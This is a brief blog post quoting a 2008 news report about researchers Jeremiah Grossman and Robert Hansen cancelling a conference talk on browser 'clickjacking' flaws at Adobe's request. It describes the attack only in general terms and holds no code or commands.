"In another event for the "internet is broken" files, two prominent
security researchers have pulled a scheduled talk that was to
demonstrate critical holes affecting anyone who uses a browser to surf
the web.
Jeremiah Grossman and Robert "RSnake" Hansen say they planned to
demonstrate serious "clickjacking" vulnerabilities involving every
major browser during a presentation scheduled for September 24 at
OWASP’s AppSec 2008 Conference
in New York. They canceled their talk at the request of Adobe, one of
the developers whose software is vulnerable to the weakness, they say.
The pair planned to disclose flaws in the architecture of all of
today’s web browsers that allow malicious websites to control the links
visitors click on. Once lured to a fraudulent address, a user may think
he’s clicking on a link that leads to Google – when in fact it takes
him to a money transfer page, a banner add that’s part of a click-fraud
scheme, or any other destination the attacker chooses.
The technique can also forge the address that appears on a status
bar at the bottom of a web browser, so even those who are careful to
check referring address before clicking can be tricked, Grossman says."
Jeremiah has also posted an entry on his blog worth checking out.
Read more at theregister: http://www.theregister.co.uk/2008/09/16/critical_vulnerability_demo_pulled/
